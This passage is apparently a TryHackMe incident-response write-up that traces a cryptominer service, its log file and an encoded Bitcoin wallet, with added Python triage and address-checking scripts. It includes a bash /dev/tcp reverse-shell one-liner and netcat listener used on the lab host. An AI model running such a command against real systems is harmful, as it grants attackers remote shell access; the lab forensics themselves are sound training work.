systemd-update-utmp.service loaded active exited Update UTMP about System Boot/Shutdown
systemd-user-sessions.service loaded active exited Permit User Sessions
ubuntu.service loaded active running TRYHACK3M
udisks2.service loaded active running Disk Manager
ufw.service loaded active exited Uncomplicated firewall
unattended-upgrades.service loaded active running Unattended Upgrades Shutdown
upower.service loaded active running Daemon for power management
user-runtime-dir@1000.service loaded active exited User Runtime Directory /run/user/1000
user-runtime-dir@114.service loaded active exited User Runtime Directory /run/user/114
user@1000.service loaded active running User Manager for UID 1000
user@114.service loaded active running User Manager for UID 114
whoopsie.service loaded active running crash report submission daemon
wpa_supplicant.service loaded active running WPA supplicant
LOAD = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB = The low-level unit activation state, values depend on unit type.
78 loaded units listed. Pass --all to see loaded but inactive units, too.
To show all installed unit files use 'systemctl list-unit-files'.
Shell> systemctl cat ubuntu.service
# /etc/systemd/system/ubuntu.service
[Unit]
Description=TRYHACK3M
[Service]
Type=simple
ExecStart=/lib/NetworkManager/nm-inet-dialog
Restart=on-failure
[Install]
WantedBy=multi-user.target
So it's nm-inet-dialog.
Question 03
What is the service name affiliated with the suspicious process?
- ubuntu.service
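Added example for Questions 02 and 03 (mine, not from the room or the writeup's author): a small triage script that parses the `systemctl list-units` table and the `systemctl cat` unit dump shown above, and flags units defined under /etc/systemd/system (written locally, not shipped by a package) that start a binary sitting inside a package-managed directory such as /lib. That combination is exactly what makes ubuntu.service and its ExecStart stand out. The ssh.service unit file is a constructed stand-in for a normal package-shipped service, included for contrast; the heuristics and function names are my own assumptions.

```python
import re

# Excerpt of the `systemctl list-units --type=service` output shown above.
LIST_UNITS = """UNIT LOAD ACTIVE SUB DESCRIPTION
badr.service loaded active running My startup script
httpd.service loaded active running LSB: starts Apache Web Server
● logrotate.service loaded failed failed Rotate log files
ssh.service loaded active running OpenBSD Secure Shell server
ubuntu.service loaded active running TRYHACK3M

LOAD = Reflects whether the unit definition was properly loaded.
"""

# ubuntu.service is the unit dumped above; ssh.service is a CONSTRUCTED
# stand-in for a package-shipped unit (path under /lib/systemd/system).
UNIT_FILES = {
    "ubuntu.service": """# /etc/systemd/system/ubuntu.service
[Unit]
Description=TRYHACK3M
[Service]
Type=simple
ExecStart=/lib/NetworkManager/nm-inet-dialog
Restart=on-failure
[Install]
WantedBy=multi-user.target
""",
    "ssh.service": """# /lib/systemd/system/ssh.service
[Unit]
Description=OpenBSD Secure Shell server
[Service]
ExecStart=/usr/sbin/sshd -D $SSHD_OPTS
Restart=on-failure
[Install]
WantedBy=multi-user.target
""",
}

# Directories whose contents are normally owned by packages, not by admins.
PACKAGE_DIRS = ("/lib/", "/usr/lib/", "/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/")


def parse_list_units(text: str) -> list[dict]:
    """Turn the list-units table into dicts; skips the header, legend and footer."""
    units = []
    for line in text.splitlines():
        line = line.lstrip("● ").strip()          # failed units carry a bullet prefix
        parts = line.split(None, 4)               # description may contain spaces
        if len(parts) < 5 or not parts[0].endswith(".service"):
            continue
        units.append(dict(zip(("unit", "load", "active", "sub", "description"), parts)))
    return units


def parse_unit_file(text: str) -> dict:
    """Parse a `systemctl cat` dump: leading '# path' comment plus [Section] Key=Value lines."""
    unit = {"path": None}
    section = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("#"):
            m = re.match(r"#\s*(/\S+)", line)
            if m and unit["path"] is None:
                unit["path"] = m.group(1)
        elif line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif "=" in line and section:
            key, value = line.split("=", 1)
            unit[f"{section}.{key.strip()}"] = value.strip()
    return unit


def exec_binary(exec_start: str) -> str:
    """First token of ExecStart, minus systemd's optional prefix characters (-, @, +, !, :)."""
    return exec_start.split()[0].lstrip("-@+!:") if exec_start.strip() else ""


def triage(list_units_text: str, unit_files: dict) -> list[dict]:
    """Flag locally defined units whose binary lives where only packages should write."""
    findings = []
    for u in parse_list_units(list_units_text):
        raw = unit_files.get(u["unit"])
        if raw is None:
            continue
        f = parse_unit_file(raw)
        binary = exec_binary(f.get("Service.ExecStart", ""))
        local = (f["path"] or "").startswith("/etc/systemd/system/")
        reasons = []
        if local:
            reasons.append("unit defined locally under /etc/systemd/system (not shipped by a package)")
        if local and binary.startswith(PACKAGE_DIRS):
            reasons.append("local unit starts a binary inside a package-managed directory; verify with dpkg -S")
        if local and f.get("Service.Restart"):
            reasons.append(f"Restart={f['Service.Restart']} keeps it running if killed")
        if reasons:
            findings.append({"unit": u["unit"], "description": u["description"],
                             "exec": binary, "path": f["path"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in triage(LIST_UNITS, UNIT_FILES):
        print(finding)
```

On a live host you would feed `triage` the real `systemctl list-units` output and a `systemctl cat` dump for every running service; the dpkg -S follow-up then tells you whether the flagged binary was installed by a package or dropped there by hand.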
Question 04
What is the log file name of the miner instance?
So let's first move to /lib/NetworkManager/, since that's where the suspicious process is stored, and see what's inside.
We can't use cd in this exploited shell, so I'm going to get a reverse shell. First create a listener, then run this in the exploited shell:
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
┌──(0xneobyte㉿0xNeoShell)-[~]
└─$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.152.127 48898
bash: cannot set terminal process group (1285): Inappropriate ioctl for device
bash: no job control in this shell
apache@tryhackme:/data/www/default$ ls
ls
650c844110baced87e1606453b93f22a.txt
index.php
kod
license.txt
phpmyadmin
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
Now we are inside the location:
apache@tryhackme:/lib/NetworkManager$ ls
ls
VPN
conf.d
dispatcher.d
inet.conf
nm-dhcp-helper
nm-dispatcher
nm-iface-helper
nm-inet-dialog
nm-initrd-generator
nm-openvpn-auth-dialog
nm-openvpn-service
nm-openvpn-service-openvpn-helper
nm-pptp-auth-dialog
nm-pptp-service
system-connections
And inet.conf is the log file.
Question 05
What is the wallet address of the miner instance?
apache@tryhackme:/lib/NetworkManager$ head inet.conf
head inet.conf
ID: 5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d
2024-04-08 10:46:04,743 [*] confbak: Ready!
2024-04-08 10:46:04,743 [*] Status: Mining!
2024-04-08 10:46:08,745 [*] Miner()
2024-04-08 10:46:08,745 [*] Bitcoin Miner Thread Started
2024-04-08 10:46:08,745 [*] Status: Mining!
2024-04-08 10:46:10,747 [*] Miner()
2024-04-08 10:46:12,748 [*] Miner()
2024-04-08 10:46:14,751 [*] Miner()
2024-04-08 10:46:16,753 [*] Miner()
After pasting this into CyberChef we decoded it: bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qabc1qyk79fcp9had5kreprce89tkh4wrtl8avt4l67qa
If you look closely, the same wallet address is repeated: bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa bc1qyk79fcp9had5kreprce89tkh4wrtl8avt4l67qa
So the first one is the correct one, as per the standard Bitcoin wallet address format.
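Added example (mine, not from the writeup): the ID line decodes as hex wrapping two layers of base64 (the layering is what the bytes themselves yield; the page does not state it), and the result splits into the two candidates noticed above. Rather than eyeballing them, the block validates each against BIP173: a bc1q address carries a bech32 checksum and a witness-v0 program of exactly 20 or 32 bytes, so the 43-character copy fails on length while the 42-character one has to pass the checksum. The checker also accepts bech32m (witness v1 and later, BIP350), which goes beyond this case. The function names are mine.

```python
import base64

# The ID line from inet.conf as shown above.
MINER_ID_HEX = (
    "5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b"
    "52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b3536"
    "6247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a59323553"
    "63303948526a4a6b52464a7a546d706b65466c525054303d"
)


def decode_miner_id(hex_id: str) -> str:
    """hex -> base64 -> base64 -> text: the three layers wrapped around this ID."""
    layer1 = bytes.fromhex(hex_id)        # printable base64 text
    layer2 = base64.b64decode(layer1)     # still base64
    return base64.b64decode(layer2).decode("ascii")


def split_candidates(blob: str) -> list[str]:
    """Split a run of concatenated mainnet addresses on the 'bc1' prefix."""
    return ["bc1" + part for part in blob.split("bc1") if part]


# BIP173 bech32 machinery.
CHARSET = "qpzry9x8gf2tvdw0s3jn54khce6mua7l"
GENERATOR = (0x3B6A57B2, 0x26508E6D, 0x1EA119FA, 0x3D4233DD, 0x2A1462B3)


def bech32_polymod(values) -> int:
    chk = 1
    for v in values:
        top = chk >> 25
        chk = ((chk & 0x1FFFFFF) << 5) ^ v
        for i in range(5):
            if (top >> i) & 1:
                chk ^= GENERATOR[i]
    return chk


def bech32_hrp_expand(hrp: str) -> list[int]:
    return [ord(c) >> 5 for c in hrp] + [0] + [ord(c) & 31 for c in hrp]


def check_segwit_address(addr: str) -> tuple[bool, str]:
    """Validate a mainnet bc1 address: charset, witness program length, checksum."""
    if addr != addr.lower() and addr != addr.upper():
        return False, "mixed case"
    addr = addr.lower()
    sep = addr.rfind("1")
    if sep < 1 or len(addr) > 90 or len(addr) - sep - 1 < 7:
        return False, "bad separator/length"
    hrp, data_part = addr[:sep], addr[sep + 1:]
    if hrp != "bc" or any(c not in CHARSET for c in data_part):
        return False, "wrong HRP or invalid character"
    data = [CHARSET.index(c) for c in data_part]
    version, program_groups = data[0], len(data) - 7     # minus version and 6 checksum groups
    if version == 0 and program_groups not in (32, 52):   # 20 or 32 bytes as 5-bit groups
        return False, f"witness v0 program must be 20 or 32 bytes, got {program_groups} groups"
    const = 1 if version == 0 else 0x2BC830A3             # bech32 for v0, bech32m for v1+
    if bech32_polymod(bech32_hrp_expand(hrp) + data) != const:
        return False, "checksum mismatch"
    return True, "ok"


if __name__ == "__main__":
    for cand in split_candidates(decode_miner_id(MINER_ID_HEX)):
        print(cand, check_segwit_address(cand))
```

The checksum matters for the defender as much as the length: bech32 is a BCH code that detects any change of up to four characters, so a single mistyped or altered character in an address pulled out of a log is always caught before it is used as an IoC or fed to a blockchain lookup.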
Question 06
So for the next question, I actually had to go through a writeup and found that the threat group is "LockBit".